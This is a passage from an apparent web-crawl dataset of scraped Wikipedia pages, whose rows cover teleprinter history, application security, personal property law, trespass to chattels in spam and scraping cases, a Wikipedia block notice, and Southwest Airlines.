feed character forced the carriage to move to the same position on the next line) to teleprinters. In modern computing and communications a few control characters, such as carriage return and line feed, have retained their original functions (although they are often implemented in software rather than activating electromechanical mechanisms to move a physical printer carriage) but many others are no longer required and are used for other purposes. Some teleprinters had a "Here is" key, which transmitted a fixed sequence of 20 or 22 characters, programmable by breaking tabs off a drum. This sequence could also be transmitted automatically upon receipt of an ENQ (control E) signal, if enabled. 28 29 This was commonly used to identify a station; the operator could press the key to send the station identifier to the other end, or the remote station could trigger its transmission by sending the ENQ character, essentially asking "who are you? British Creed Company built teleprinters for the GPO's teleprinter service. 30 The Gretag ETK 47 teleprinter developed in Switzerland by Edgar Gretener in 1947 uses a 14 bit start-stop transmission method similar to the 5 bit code used by other teleprinters. However, instead of a more-or-less arbitrary mapping between 5 bit codes and letters in the Latin alphabet, all characters (letters, digits, and punctuation) printed by the ETK are built from 14 basic elements on a print head, very similar to the 14 elements on a modern fourteen-segment display, each one selected independently by one of the 14 bits during transmission. Because it does not use a fixed character set, but instead builds up characters from smaller elements, the ETK printing element does not require modification to switch between Latin, Cyrillic, and Greek characters. 31 32 33 34 In 1931, American inventor Edward Kleinschmidt formed Kleinschmidt Labs to pursue a different design of teleprinter. In 1944 Kleinschmidt demonstrated their lightweight unit to the Signal Corps and in 1949 their design was adopted for the Army's portable needs. In 1956, Kleinschmidt Labs merged with Smith-Corona, which then merged with the Marchant Calculating Machine Co., forming the SCM Corporation. By 1979, the Kleinschmidt division was turning to Electronic Data Interchange and away from mechanical products. Kleinschmidt machines, with the military as their primary customer, used standard military designations for their machines. The teleprinter was identified with designations such as a TT 4 FG, while communication "sets" to which a teleprinter might be a part generally used the standard Army Navy designation system such as AN FGC 25. This includes Kleinschmidt teleprinter TT 117 FG and tape reperforator TT 179 FG. Morkrum made their first commercial installation of a printing telegraph with the Postal Telegraph Company in Boston and New York in 1910. 35 It became popular with railroads, and the Associated Press adopted it in 1914 for their wire service. 16 36 Morkrum merged with their competitor Kleinschmidt Electric Company to become Morkrum-Kleinschmidt Corporation shortly before being renamed the Teletype Corporation. 37 38 Italian office equipment maker Olivetti (est. 1908) started to manufacture teleprinters in order to provide Italian post offices with modern equipment to send and receive telegrams. The first models typed on a paper ribbon, which was then cut and glued into telegram forms. Siemens Halske, later Siemens AG, a German company, founded in 1847. The Teletype Corporation, a part of American Telephone and Telegraph Company's Western Electric manufacturing arm since 1930, was founded in 1906 as the Morkrum Company. In 1925, a merger between Morkrum and Kleinschmidt Electric Company created the Morkrum-Kleinschmidt Company. The name was changed in December 1928 to Teletype Corporation. In 1930, Teletype Corporation was purchased by the American Telephone and Telegraph Company and became a subsidiary of Western Electric. In 1984, the divestiture of the Bell System resulted in the Teletype name and logo being replaced by the AT T name and logo, eventually resulting in the brand being extinguished. 39 The last vestiges of what had been the Teletype Corporation ceased in 1990, bringing to a close the dedicated teleprinter business. Despite its long-lasting trademark status, the word Teletype went into common generic usage in the news and telecommunications industries. Records of the United States Patent and Trademark Office indicate the trademark has expired and is considered dead. 40 Teletype machines tended to be large, heavy, and extremely robust, capable of running non-stop for months at a time if properly lubricated. 41 The Model 15 stands out as one of a few machines that remained in production for many years. It was introduced in 1930 and remained in production until 1963, a total of 33 years of continuous production. Very few complex machines can match that record. The production run was stretched somewhat by World War II—the Model 28 was scheduled to replace the Model 15 in the mid 1940s, but Teletype built so many factories to produce the Model 15 during World War II, it was more economical to continue mass production of the Model 15. The Model 15, in its receive only, no keyboard, version was the classic "news Teletype" for decades. Several different high-speed printers like the "Ink-tronic" etc. Texas Instruments developed its own line of teletypes in 1971, the Silent 700. Their name came from the use of a thermal printer head to emit copy, making them substantially quieter than contemporary teletypes using impact printing, and some such as the 1975 Model 745 and 1983 Model 707 were even small enough to be sold as portable units. Certain models came with acoustic couplers and some had internal storage, initially cassette tape in the 1973 Models 732 733 ASR and later bubble memory in the 1977 Models 763 765, the first and one of the few commercial products to use the technology. 43 In these units their storage capability essentially acted as a form of punched tape. The last Silent 700 was the 1987 700 1200 BPS, which was sold into the early 1990s. A global teleprinter network called Telex was developed in the late 1920s, and was used through most of the 20th century for business communications. The main difference from a standard teleprinter is that Telex includes a switched routing network, originally based on pulse-telephone dialing, which in the United States was provided by Western Union. AT T developed a competing network called "TWX" which initially also used rotary dialing and Baudot code, carried to the customer premises as pulses of DC on a metallic copper pair. TWX later added a second ASCII-based service using Bell 103 type modems served over lines whose physical interface was identical to regular telephone lines. In many cases, the TWX service was provided by the same telephone central office that handled voice calls, using class of service to prevent POTS customers from connecting to TWX customers. Telex is still in use in some countries for certain applications such as shipping, news, weather reporting and military command. Many business applications have moved to the Internet as most countries have discontinued telex TWX services. In addition to the 5 bit Baudot code and the much later seven-bit ASCII code, there was a six-bit code known as the Teletypesetter code (TTS) used by news wire services. It was first demonstrated in 1928 and began to see widespread use in the 1950s. 44 Through the use of "shift in" and "shift out" codes, this six-bit code could represent a full set of upper and lower case characters, digits, symbols commonly used in newspapers, and typesetting instructions such as "flush left" or "center", and even "auxiliary font", to switch to italics or bold type, and back to roman ("upper rail"). 45 The TTS produces aligned text, taking into consideration character widths and column width, or line length. A Model 20 Teletype machine with a paper tape punch ("reperforator") was installed at subscriber newspaper sites. Originally these machines would simply punch paper tapes and these tapes could be read by a tape reader attached to a "Teletypesetter operating unit" installed on a Linotype machine. The "operating unit" was essentially a tape reader which actuated a mechanical box, which in turn operated the Linotype's keyboard and other controls, in response to the codes read from the tape, thus creating type for printing in newspapers and magazines. 46 This allowed higher production rates for the Linotype, and was used both locally, where the tape was first punched and then fed to the machine, as well as remotely, using tape transmitters and receivers. Remote use played an essential role for distributing identical content, such as syndicated columns, news agency news, classified advertising, and more, to different publications across wide geographical areas. In later years the incoming 6 bit current loop signal carrying the TTS code was connected to a minicomputer or mainframe for storage, editing, and eventual feed to a phototypesetting machine. Computers used teleprinters for input and output from the early days of computing. Punched card readers and fast printers replaced teleprinters for most purposes, but teleprinters continued to be used as interactive time-sharing terminals until video displays became widely available in the late 1970s. Users typed commands after a prompt character was printed. Printing was unidirectional; if the user wanted to delete what had been typed, further characters were printed to indicate that previous text had been cancelled. When video displays first became available the user interface was initially exactly the same as for an electromechanical printer; expensive and scarce video terminals could be used interchangeably with teleprinters. This was the origin of the text terminal and the command-line interface. Paper tape was sometimes used to prepare input for the computer session off line and to capture computer output. The popular Teletype Model 33 used 7 bit ASCII code (with an eighth parity bit) instead of Baudot. The common modem communications settings, Start Stop Bits and Parity, stem from the Teletype era. In early operating systems such as Digital's RT 11, serial communication lines were often connected to teleprinters and were given device names starting with tt. This and similar conventions were adopted by many other operating systems. Unix and Unix-like operating systems use the prefix tty, for example dev tty13, or pty (for pseudo-tty), such as dev ptya0, but some of them (e.g. Solaris recent Linux) have replaced pty files by a pts folder (where "pt" stands for "pseudoterminal" instead). In many computing contexts, "TTY" has become the name for any text terminal, such as an external console device, a user dialing into the system on a modem on a serial port device, a printing or graphical computer terminal on a computer's serial port or the RS 232 port on a USB-to-RS 232 converter attached to a computer's USB port, or even a terminal emulator application in the window system using a pseudoterminal device. Teleprinters were also used to record fault printout and other information in some TXE telephone exchanges. Although printing news, messages, and other text at a distance is still universal, the dedicated teleprinter tied to a pair of leased copper wires was made functionally obsolete by the fax, personal computer, inkjet printer, email, and the Internet. In the 1980s, packet radio became the most common form of digital communications used in amateur radio. Soon, advanced multimode electronic interfaces such as the AEA PK 232 were developed, which could send and receive not only packet, but various other modulation types including Baudot. This made it possible for a home or laptop computer to replace teleprinters, saving money, complexity, space and the massive amount of paper which mechanical machines used. |
167 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Application_security | Application security (short AppSec) includes all tasks that introduce a secure software development life cycle to development teams. Its final goal is to improve security practices and, through that, to find, fix and preferably prevent security issues within applications. It encompasses the whole application life cycle from requirements analysis, design, implementation, verification as well as maintenance. 1 Web application security is a branch of information security that deals specifically with the security of websites, web applications, and web services. At a high level, web application security draws on the principles of application security but applies them specifically to the internet and web systems. 2 3 The application security also concentrates on mobile apps and their security which includes iOS and Android Applications Web Application Security Tools are specialized tools for working with HTTP traffic, e.g., Web application firewalls. Different approaches will find different subsets of the security vulnerabilities lurking in an application and are most effective at different times in the software lifecycle. They each represent different tradeoffs of time, effort, cost and vulnerabilities found. The Open Web Application Security Project (OWASP) provides free and open resources. It is led by a non-profit called The OWASP Foundation. The OWASP Top 10 - 2017 results from recent research based on comprehensive data compiled from over 40 partner organizations. This data revealed approximately 2.3 million vulnerabilities across over 50,000 applications. 4 According to the OWASP Top 10 - 2021, the ten most critical web application security risks include: 5 Security testing techniques scour for vulnerabilities or security holes in applications. These vulnerabilities leave applications open to exploitation. Ideally, security testing is implemented throughout the entire Software Development Life Cycle (SDLC) so that vulnerabilities may be addressed in a timely and thorough manner. There are many kinds of automated tools for identifying vulnerabilities in applications. Common tool categories used for identifying application vulnerabilities include: Resin is a new tool for improving application security and reducing vulnerabilities. It allows developers to specify rules about how data should flow through an application to prevent security issues. This is done using policy objects to define the rules, data tracking to monitor the data flow, and filter objects to check the rules at specific points in the data flow. 12 |
168 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Personal_property | Personal property is property that is movable. 1 In common law systems, personal property may also be called chattels or personalty. In civil law systems, personal property is often called movable property or movables—any property that can be moved from one location to another. Personal property can be understood in comparison to real estate, immovable property or real property (such as land and buildings). Movable property on land (larger livestock, for example) was not automatically sold with the land, it was "personal" to the owner and moved with the owner. The word cattle is the Old Norman variant of Old French chatel, chattel (derived from Latin capitalis, "of the head"), which was once synonymous with general movable personal property. 2 Personal property may be classified in a variety of ways. Intangible personal property or "intangibles" refers to personal property that cannot actually be moved, touched or felt, but instead represents something of value such as negotiable instruments, securities, service (economics), and intangible assets including chose in action. 3 Tangible personal property refers to any type of property that can generally be moved (i.e., it is not attached to real property or land), touched or felt. These generally include items such as furniture, clothing, jewelry, art, writings, or household goods. In some cases, there can be formal title documents that show the ownership and transfer rights of that property after a person's death (for example, motor vehicles, boats, etcetera) In many cases, however, tangible personal property will not be "titled" in an owner's name and is presumed to be whatever property he or she was in possession of at the time of his or her death. 4 Accountants distinguish personal property from real property because personal property can be depreciated faster than improvements (while land is not depreciable at all). It is an owner's right to get tax benefits for chattel, and there are businesses that specialize in appraising personal property, or chattel. The distinction between these types of property is significant for a variety of reasons. Usually, one's rights on movables are more attenuated than one's rights on immovables (or real property). The statutes of limitations or prescriptive periods are usually shorter when dealing with personal or movable property. Real property rights are usually enforceable for a much longer period of time and in most jurisdictions real estate and immovables are registered in government-sanctioned land registers. In some jurisdictions, rights (such as a lien or other security interest) can be registered against personal or movable property. In common law it is possible to place a mortgage upon real property. Such a mortgage requires payment, or the owner of the mortgage can seek foreclosure. Personal property can often be secured with a similar kind of device, variously called a chattel mortgage, a trust receipt, or a security interest. In the United States, Article 9 of the Uniform Commercial Code governs the creation and enforcement of security interests in most (but not all) types of personal property. There is no similar institution to the mortgage in the civil law, however a hypothec is a device to secure real rights against property. These real rights follow the property along with the ownership. In common law a lien also remains on the property, and it is not extinguished by alienation of the property; liens may be real or equitable. Many jurisdictions levy a personal property tax, an annual tax on the privilege of owning or possessing personal property within the boundaries of the jurisdiction. Automobile and boat registration fees are a subset of this tax. Most household goods are exempt as long as they are kept or used within the household. The distinction between tangible and intangible personal property is also significant in some of the jurisdictions which impose sales taxes. In Canada, for example, provincial and federal sales taxes were imposed primarily on sales of tangible personal property whereas sales of intangibles tended to be exempt. The move to value added taxes, under which almost all transactions are taxable, has diminished the significance of the distinction. 5 Private and personal property are considered to be identical without the need for a distinction. 6 better source needed |
169 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Trespass_to_chattels | Trespass to chattels is a tort whereby the infringing party has intentionally (or, in Australia, negligently) interfered with another person's lawful possession of a chattel (movable personal property). The interference can be any physical contact with the chattel in a quantifiable way, or any dispossession of the chattel (whether by taking it, destroying it, or barring the owner's access to it). As opposed to the greater wrong of conversion, trespass to chattels is argued to be actionable per se. The origin of the concept comes from the original writ of trespass de bonis asportatis. As in most other forms of trespass, remedy can only be obtained once it is proven that there was direct interference regardless of damage being done, and the infringing party has failed to disprove either negligence or intent. In some common-law countries, such as the United States and Canada, a remedy for trespass to chattels can only be obtained if the direct interference was sufficiently substantial to amount to dispossession, or alternatively where there had been an injury proximately related to the chattel. (See Restatement (Second) of Torts, 1965.) The Restatement of Torts, Second 217 defines trespass to chattels as "intentionally… dispossessing another of the chattel, or using or intermeddling with a chattel in the possession of another. Harm to personal property or diminution of its quality, condition or value as a result of a defendant's use can also result in liability under 218(b) of the Restatement. Certain specific circumstances may lend themselves to liability for the action. The Restatement (Second) of Torts 218 states further that: One who commits a trespass to a chattel is subject to liability to the possessor of the chattel if, but only if, The trespass to chattels cause of action, frequently asserted in recent years against Internet advertisers and email spammers, is often included in complaints against spyware companies. These electronic messaging cases, and their progeny, which have cropped up over the last decade, will typically turn on the situations described in (b) or (d), and, as detailed below, the question of harm caused is a big issue. In sum, the basic elements of a claim of trespass to chattels are: 1) the lack of the plaintiff's consent to the trespass, 2) interference or intermeddling with possessory interest, and 3) the intentionality of the defendant's actions. Actual damage is not necessarily a required element of a trespass to chattels claim. 1 2 Damages from a trespass claim are limited to the actual harm sustained by the plaintiff (which can include economic loss consequent on the trespass - e.g. loss of profit on a damaged chattel). In cases of dispossession, the plaintiff is always entitled to damages if they can prove the dispossession occurred, even if no quantifiable harm can be proven. A related tort is conversion, which involves an exercise of control over another's chattel justifying restitution of the chattel's full value. Some actions constitute trespass and conversion; in these cases, a plaintiff must choose which claim to make based on what amount of damages they seek to recover. The common law tort of trespass to chattels has been invoked in the modern context of electronic communications to combat the proliferation of unsolicited bulk email, commonly known as spam. 2 In addition, several companies have successfully used the tort to block certain people, usually competitors, from accessing their servers. Though courts initially endorsed a broad application of this legal theory in the electronic context, more recently other jurists have narrowed its scope. As trespass to chattels is extended further to computer networks, some fear that plaintiffs are using this cause of action to quash fair competition and to deter the exercise of free speech; consequently, critics call for the limitation of the tort to instances where the plaintiff can demonstrate actual damages. The trespass to chattels tort punishes anyone who substantially interferes with the use of another's personal property, or chattels. Plaintiffs must show that the offender had intentional physical contact with the chattel and that the contact caused some substantial interference or damage. The courts that imported this common law doctrine into the digital world reasoned that electrical signals traveling across networks and through proprietary servers may constitute the contact necessary to support a trespass claim. Applying this common law action to computer networks, plaintiffs must first prove that they received some type of electronic communication (typically bulk e-mail or spam) that the defendant intentionally sent to interfere with the plaintiff's interest in his or her property and second that this communication caused a quantifiable harm to their tangible property, such as impaired functioning of the computer, network or server. 3 In the late 1990s, when the World Wide Web was in its infancy, courts were more receptive to extending the trespass to chattels tort to the electronic context. In CompuServe Inc. v. Cyber Promotions, Inc., a 1997 case that was the first to extend the trespass theory to computer networks, a federal district court held that a marketing company's mass mailing of a high volume of unsolicited advertisement emails to CompuServe subscribers constituted an actionable trespass to chattels. 4 CompuServe customers repeatedly received unwanted advertisements from Cyber Promotions, a company that specialized in sending marketing email in bulk. Cyber Promotions also modified its equipment and falsified other information to circumvent CompuServe's anti-spam measures. Due to the high volume of email, CompuServe claimed damage to its servers as well as money lost dealing with customer complaints and dissatisfaction. CompuServe also extended its damages claim to its subscribers who spent time deleting unwanted email. The court held that Cyber Promotions's intentional use of CompuServe's proprietary server was an actionable trespass to chattels and granted a preliminary injunction enjoining the spammer from sending unsolicited advertisements to any email address maintained by CompuServe. Cyber Promotions' persistence in sending email to CompuServe's servers after receiving notification that CompuServe no longer consented to the use weighed heavily in favor of a finding of trespass. A trio of 1998 cases in the Eastern District of Virginia involving America Online more firmly established the use of the trespass to chattels tort as a spam-fighting tool. In America Online, Inc. v. IMS, the court held that the owner of a marketing company committed trespass to chattels against an Internet service provider's (ISP) computer network by sending 60 million unauthorized email advertisements to the ISP's subscribers after being notified that the spam was unauthorized. 5 The court found that the defendant, intentionally and without authorization, caused contact with the plaintiff's computer network by sending the bulk email messages. Such contact injured the plaintiff's business goodwill and diminished the functioning of its computer network. Similarly, in America Online, Inc. v. LCGM, Inc., a company engaging in pornographic website advertising sent a deluge of spam to AOL's customers, and, in so doing, also forged the AOL domain name in an effort to trick customers into opening the emails. 6 The court once again held that a website operators' transmission of unsolicited bulk emails to customers of an ISP, using the provider's computers and computer network, constituted trespass to chattels. In America Online, Inc. v. Prime Data Systems, Inc., the defendants sent millions of spam emails to AOL subscribers advertising computer software programs designed to facilitate bulk emailing by allowing users to harvest email addresses from the plaintiff's member directories, chat rooms, and electronic bulletin boards. 7 The defendants also used technology designed to avoid AOL's spam filtering mechanisms. The defendants frequently used false and deceptive "headers" in email messages to make it appear as if AOL had sent the messages. The increased demand on AOL's servers resulting from the spam caused substantial delays of up to 24 hours in the delivery of all email to AOL members, forcing AOL to temporarily stop accepting any new messages. As the spam problem grew worse, AOL had to purchase millions of dollars worth of additional equipment to increase the capacity of its servers to handle the volume of email. The court held that this activity constituted a trespass to chattels and awarded injunctive relief, reasonable attorneys' fees and costs, as well as damages. Since the early spam cases, courts have extended the electronic trespass to chattels theory even further to encompass screen-scraping and other data "harvesting. Screen-scraping is the practice of taking information from another website, generally through the use of search agent software, and "harvesting" the data for one's own commercial use. For example, travel websites frequently use this tactic to offer a host of options and prices gleaned from various airlines' sites. Because the courts have entertained such litigation, some companies have specifically banned the conduct in their terms and conditions statements. 8 In eBay v. Bidder's Edge (2000), eBay successfully used the trespass to chattels tort to prevent Bidder's Edge from employing spiders to cull information about its auctions to display on its own website. 3 Although Bidder's Edge's robots only consumed a small percentage of eBay's computer resources, the court noted that the plaintiff need not demonstrate current substantial interference as conduct which constituted a use of another's property is enough to sustain a trespass to chattels claim. In light of this, the court found that eBay had demonstrated a sufficient likelihood of future injury to warrant granting a permanent injunction: "If the court were to hold otherwise, it would likely encourage other auction aggregators to crawl the eBay site, potentially to the point of denying effective access to eBay's customers. 3 Register.com, Inc. v. Verio, Inc. (2000) is a further example of this temporary trend in which plaintiffs did not have to demonstrate any real interference. 9 Register.com, a domain name registry service, sued competitor Verio for using Register.com's proprietary WHOIS look-up service to find potential leads among its customer base. The court found that, by continuing to access Register.com's online customer database after being told to stop, Verio was trespassing on Register.com's WHOIS server. Register.com had specifically withdrawn its consent to Verio's use of search robots to review Register.com's customer list. The court held that Verio caused harm to Register.com's files through the use of these search robots and that the searches improperly taxed Register.com's server capacity. These holdings gave the court license to expand the applicability of trespass to chattels to computer networks even further. In Oyster Software v. Forms Processing (2001), the Northern District of California determined that a plaintiff need not demonstrate any physical interference with a server at all to sustain a trespass to chattels claim and consequently denied the defendant's motion for summary judgment, even though there was no evidence of damage to the plaintiff's computer system. 10 Although Oyster conceded that there was no evidence that the defendant's activities had interfered in any way with the functioning of Oyster's computer system, the court nonetheless denied FPI's motion for summary judgment. According to the court, following the decision in eBay, plaintiffs only need to demonstrate that the defendant's actions "amounted to a 'use' of Plaintiff's computer, and the court determined that copying the metatags amounted to a use. 10 These cases indicate that, at least in California, a plaintiff did not have to demonstrate any kind of actual interference with the computer system to successfully claim trespass to chattels. However, some courts subsequently limited tort claims for electronic trespasses, in that a complaining party may be unable to recover for lack of real harm if the party did not suffer any tangible damage to their property. The Supreme Court of California reversed the trend exemplified by Oyster in the seminal case Intel Corp. v. Hamidi (2003), reaffirming the need for a demonstration either of actual interference with the physical functionality of the computer system or of the likelihood that this would happen in the future. 11 Although Intel conceded that Hamidi's emails caused neither physical damage nor any disruption to their computer system, they alleged that the economic productivity lost due to the disruption caused by the emails could sustain a trespass claim. The Supreme Court of California disagreed, holding that the tort does not extend to claims in which the electronic communication involved "neither damages the recipient computer system nor impairs its function. 11 In reaching this conclusion, the court criticized the understanding of eBay advanced in Oyster, explaining that previous cases in which courts have found trespass to chattels in the electronic setting have involved either "actual or threatened interference with the computers' function. 11 To that effect, the court in Oyster misconstrued the holding in eBay; trespass requires more than use a use it requires an actual or threatened interference with the physical functionality of the system. Although the vast majority of states have yet to determine the applicability of the trespass to chattels theory, the courts that have addressed the issue have applied Intel and required that the plaintiff demonstrate damage to the computer system. A supreme court in New York in School of Visual Arts v. Kuprewicz denied the defendant's motion to dismiss for failure to state a claim on the trespass to chattels claim because the plaintiff had alleged actual damage to the functionality of the computer system, which Intel requires; the defendant had sent enough e-mails that it reduced the computer system's functionality and drained the hard drive's memory. 12 The Fourth Circuit in Omega World Travel, Inc. v. Mummagraphics, Inc. also followed Intel, although this resulted in granting a motion for summary judgment for the defendant because the plaintiff did not allege any actual damage on its computer system. 13 The court clarified that Oklahoma courts have yet to recognize the validity of a trespass to chattels claim based on an electronic intrusion to a computer system, but if it were to recognize it, the plaintiff would need to allege more than nominal damages, which in this case it had not. Although a number of commentators have expressed enthusiasm over the increasing "propertization" of intellectual property (that is to say, the increased application of real property doctrines to intangible property) and the extension of the trespass to chattels doctrine to computer networks, 14 a number of detractors have expressed concern over the ramifications of extending the theory to protect electronic communications that do not actually damage the computer systems in question but only cause nominal damage due to their content. 15 16 17 18 Primarily, these critics worry that extending trespass to chattels in this fashion would stifle free speech on the internet because any unwelcome email might constitute a trespass and may subject the sender not only to civil liability under the trespass theory but to criminal liability as well. 19 This would presumably reduce people's willingness to communicate freely on the Internet and curtail the Internet's ability to function as an open, democratic forum. 20 Particularly in situations where the electronic communication is an email that contains speech that is of importance to the public and the communications do not hamper the functionality of the recipient's computer system, First Amendment free speech protections ought to outweigh the property right in the unharmed computer system. 21 Similarly, critics have also expressed concerns that plaintiffs have employed the doctrine to stifle legitimate competition. 22 For example, the screen-scraping cases indicate that courts might interpret trespass to chattels in such a way that allows major corporations to prevent price comparison sites from employing harmless bots to aggregate information that users want in a readily accessible format since it might encourage consumers to look elsewhere. 23 Critics of the theory's extension to computer networks also note greater theoretical problems with the applicability of a real property theory to intellectual property. In order to explain why real property theories might extend to the Internet, proponents equate "cyberspace" with real land, arguing that owners of computer servers should have the same right of inviolability as owners of land receive to promote greater efficiency in transactions. 24 However, even if some aspects of cyberspace resemble real space, detractors contend that cyberspace is not like real land at all because "the 'placeness' of cyberspace is a matter of ongoing social construction. 25 Furthermore, even if granting property rights might help to avoid problems of inefficiency and under-cultivation in the context of real property, critics note that nothing suggests that the same principles would also be effective in the context of computer networks—especially because the problem of under-cultivation does not tend to occur online. 26 |
170 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=4 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Web scraping. |
171 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Southwest_Airlines | Southwest Airlines Co. is a major airline in the United States that operates on a low-cost carrier model. It is headquartered in Love Field, Dallas, in the Dallas Fort Worth metroplex, and has scheduled service to 121 destinations in the United States and ten other countries. 3 As of 2018 update , Southwest carried more domestic passengers than any other United States airline. 4 It is currently the third largest airline in the world based on passengers flown. 5 The airline was established on March 9, 1967, 6 by Herb Kelleher and Rollin King as Air Southwest Co. and adopted its current name, Southwest Airlines Co., in 1971, when it began operating as an intrastate airline wholly within the state of Texas, first flying between Dallas, Houston, and San Antonio. 7 8 It began regional interstate service in 1979, expanding nationwide in the following decades. Southwest currently serves airports in 42 states and multiple Central American destinations. Southwest's business model is distinct from other US airlines as it uses a rolling hub and point-to-point network and allows free checked baggage. It exclusively uses Boeing 737 jets in its fleet. The airline has nearly 66,100 employees and operates about 4,000 departures a day during peak travel season. 9 10 Southwest Airlines was founded in 1966 by Herbert Kelleher and Rollin King, and incorporated as Air Southwest Co. in 1967. Three other airlines (Braniff, Trans-Texas Airways, and Continental Airlines) took legal action to try to prevent the company from its planned strategy of undercutting their prices by flying only within Texas and thus being exempt from regulation by the federal Civil Aeronautics Board. The lawsuits were resolved in 1970, and in 1971 the airline changed its name to Southwest Airlines and began operating regularly scheduled flights between the Texas Triangle cities of Dallas, Houston, and San Antonio. In 1975, Southwest began flying to other cities in Texas, and in 1979, after passage of the Airline Deregulation Act, it began flying to adjacent states. It started service to the East and the Southeast in the 1990s, 11 and Denver in 2006, 12 which is now its most popular destination. Southwest Airlines was profitable for 47 consecutive fiscal years, from 1973 through 2019. 13 In May 2024, Southwest Airlines fares started showing on Google for the first time after long being excluded from the search engine's search results. 14 As of January 2024 update , Southwest Airlines flies to over 100 destinations in 42 states, Puerto Rico, Mexico, Central America, and the Caribbean. 15 Southwest does not use the traditional hub-and-spoke system of other major airlines, preferring a point-to-point system combined with a rolling-hub model in its base cities. As of July 2024 update , the Southwest Airlines fleet consists of 816 aircraft, making it the fourth-largest commercial airline fleet in the world. All of the aircraft Southwest Airlines operates are from the Boeing 737 family of narrow-body airliners. Since its inception, Southwest Airlines has almost exclusively operated Boeing 737 aircraft (except for a brief period when it operated a handful of leased Boeing 727 aircraft). Southwest is the world's largest operator of the Boeing 737, and was the launch customer of the 737 300, 737 500, and 737 700. 16 It took delivery of its 1,000th Boeing 737 in 2023. Using a single basic aircraft type allows Southwest pilots and flight attendants to crew any aircraft in the fleet without restrictions. 17 Southwest Airlines solely offers economy-class seats, and does not have business or first-class cabins on its aircraft. 22 Still, Southwest Airlines does offer many amenities, as follows: The company permits two free-of-charge checked bags per passenger, 23 24 and passengers are permitted to change their flight up to 10 minutes prior to their flights without extra charge. In the event of a cancellation, passengers are refunded a travel credit in the amount spent on their ticket, and the credit may be used toward other Southwest Airlines or Southwest Vacations purchase. The credit does not expire. 25 Southwest offers free in-flight nonalcoholic beverages and offers alcoholic beverages for sale for $6 to $7 per beverage. Free alcoholic drinks are offered to passengers who are at least 21 on some holidays such as Valentine's Day and Halloween. They also have complimentary snacks on all flights. Southwest has become known for colorful boarding announcements and crews who sometimes burst out in song. 26 27 28 29 Prior to 2007, Southwest boarded passengers by grouping the passengers into three groups, labeled A, B and C. Passengers would line up at their specified letter and board. 30 In 2007, Southwest modified its boarding procedure by introducing a number. Each passenger receives a letter (A, B, or C) and a number 1 through 60. Passengers line up in numerical order within each letter group and choose any open seat on the aircraft. 30 A 2012 study on the television series MythBusters, found this to be the fastest method currently in use for passengers to board a plane; on average, it is 10 minutes faster than the standard method. 31 The airline was also number-one on the 2020 Airline Quality Rating list. 32 Southwest has a "customer of size" policy in which the cost of a second seat is refunded for any plus-sized travelers who take up more room than one seat. 33 34 On July 25, 2024, Southwest announced that it will be ending its long-standing open seating policy - and thereby assigning seats - beginning in 2025. The airline will also introduce premium seating options with more legroom and launch overnight flights in 2025. 35 36 As of September 2023, Wi-Fi costs $8, and allows for streaming live television, movies, streaming music, and app messaging. 37 After completing a testing phase that began in February 2009, Southwest announced on August 21, 2009, that it would begin rolling out in-flight Wi-Fi Internet connectivity via Global Eagle Entertainment's satellite-broadband-based product. Southwest began adding Wifi to its aircraft in the first quarter of 2010. The airline began testing streaming live television in the summer of 2012 and video on demand in January 2013. 38 39 As of September 2, 2023, live in-flight TV, movies, messaging (iMessage and WhatsApp) 37 and real-time flight-tracking information via Wi-Fi is available to passengers, with full Internet access available at a fee for regular passengers. 40 Southwest first began to offer a frequent-flyer program on June 18, 1987, calling it The Company Club. The program credited for trips flown regardless of distance. 41 Southwest Airlines renamed its frequent flyer program Rapid Rewards on April 25, 1996. 42 The original Rapid Rewards program offered one credit per one-way flight from an origin to a destination, including any stops or connections on Southwest Airlines. When 16 credits were accumulated in a 24 month period, Southwest awarded one free round-trip ticket that was valid for 12 months. 43 On March 1, 2011, Rapid Rewards changed to a points system based on ticket cost. Members earn and redeem points based on a four-tier fare scale multiplier and the cost of the ticket. Changes also included no blackout dates, seat restrictions, or expiring credits. Since October 18, 2019, Rapid Rewards points do not expire as long as the member is alive. 44 It also adds more options to use points. 45 46 47 48 The key trends for Southwest Airlines are (as of the financial year ending December 31): 49 The Southwest Airlines headquarters are located on the grounds of Dallas Love Field in Dallas. 9 54 Chris Sloan of Airways magazine stated they are "as much a living, breathing museum and showcase for the 'culture that LUV built' as they are corporate offices. 55 On September 17, 2012, Southwest broke ground on a new Training and Operational Support building, 56 across the street from its current headquarters building. The property includes a two-story, 100,000 square-foot Network Operations Control building that can withstand an EF3 tornado. It also includes a four-story, 392,000 square-foot office, and training facility with two levels devoted to each function. The new facilities house 24 hour coordination and 